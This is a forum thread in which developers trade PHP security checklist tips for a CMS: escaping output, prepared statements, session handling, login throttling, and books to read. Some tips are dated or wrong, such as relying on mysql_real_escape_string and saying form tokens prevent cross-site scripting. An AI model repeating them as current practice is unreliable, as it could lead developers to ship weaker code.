PHP Security Checklist

Hi everybody!

I’m in the process of writing out a CMS system for a friend’s website, and I’ve got to the point where I’ll be deploying it.

Of course, I want it to be as secure as reasonably possible. Is there a security checklist online so I can go through the code and tick off as many possible problems as I can?

Thanks :slight_smile:

[ot]Go ahead :stuck_out_tongue:

I was just back reading this thread and thought I would point out that he’s a SitePoint member. :)[/ot]

I’ll start off with some points

  • Prevent session hijacking.
  • Escape all output (htmlspecialchars, etc)
  • Use form tokens to prevent cross site scripting
  • Do not keep your db access details in a web accessible files, in fact move all php files outside of the web dir and use an index.php to dispatch control.
  • Brute force login protection
  • Use mysql_real_escape_string not just addslashes

There’s a couple of php books on this topic.

Good points.
check this out:

Read Eric Schiflett’s book, “Essential PHP Security”. short read, to the point, and worth it!

There’s also a php architect’s guide to php security.

Use PDO and prepared statements.

To escape inputs, use the filter functions :

With a few exceptions, you should assume any predefined variable or value is dirty. Even a lot of the stuff in $_SERVER.

What do you have to do to “prevent session hijacking”?

And what technique do you use for form tokens?

Always keep in mind what character set your data is in and use the proper methods to deal with it (e.g. always specify the correct charset when using [fphp]htmlentities[/fphp]) otherwise you might end up with security problems even though you’re “escaping.”

Start over.

Seriously, though. You should be thinking “How do I make this secure?” before the first line of code is written, not when you’re getting ready to push to production. That’s why there are so many insecure programs on the market today (and PHP is notoriously bad for hosting many of them).

  1. Use HTML Purifier or similar library to purify sensitive content before saving to the database
  2. Use htmlentities() for everything that can be viewed by users
  3. Don’t use just hashing for passwords, use also salt (plus you can add another layer of protection by encrypting the hashes)
  4. session_regenerate_id(), session_cache_expire() etc
  5. Use captchas on all public forms against spam and fake registrations
  6. Limit number of failed login attempts - if user cannot get his username and password right 5 times in a row, disable his account
  7. Use prepared statements (PDO or MySQLi) or at least mysql_real_escape_string()
  8. Disable magic_quotes and auto_globals!
  9. Use the latest stable version of PHP
  10. https:// instead of http:// on pages where sensitive data is being processed
  11. Keep configuration files outside the web root directory
  12. Filter and validate all $_POST and $_GET data
  13. Blacklist troublesame IPs (trying brute force attacks or spamming your comments sections etc)

And there is much more.

I assume you mean Chris Shiflett? But yes, that book’s very good.

I agree in principal, but 5 times is not enough for a regular person. You can raise that to 10 or even 50, and still combat brute force.

I only chime in with this because I always forget which email address, user name or password I used for a particular site… sometimes I have to guess more than 5 times… and I HATE getting my account locked. :smiley:

To the OP, if you even have to ask this question - do yourself a favor and get one of the good books mentioned above that cover the topic in detail. Seriously, you need an education that you won’t get from a few forum posts. Just trying to help.

Disable url_fopen if you don’t need it–most of the nastier exploits rely upon using url_fopen to download nefarious files from various sites. Not having the option can greatly limit damage.

I agree; If you really need to get content from some other website just use sockets. True it’s a little but more hassle, but so much safer! :slight_smile:

The checklist I use is a book called “Essential PHP Security”, author - Chris Shiflett, publisher - O’Reilly.

Any other checklist you might find is either going to be wrong or will be a subset of what is in the book.

The XSS Cheat Sheet is a checklist for XSS (cross site scripting) exploits.

Note that even if you have no XSS exploits, you also need to check for CSRF (cross domain request forgery), login-CSRF, and even clickjacking, and that is just on the client side. Server-side you will need to check for SQL and command injection flaws, and all manner of other validation and filtering related vulnerabilities.

Essential PHP Security is quite dated, so I wouldn’t use that as a definitive checklist. For one, I don’t think it even mentions the danger of serving uploaded files inline. There are probably other things that it is missing.

I don’t know of any definite checklist though. Maybe I’ll start one.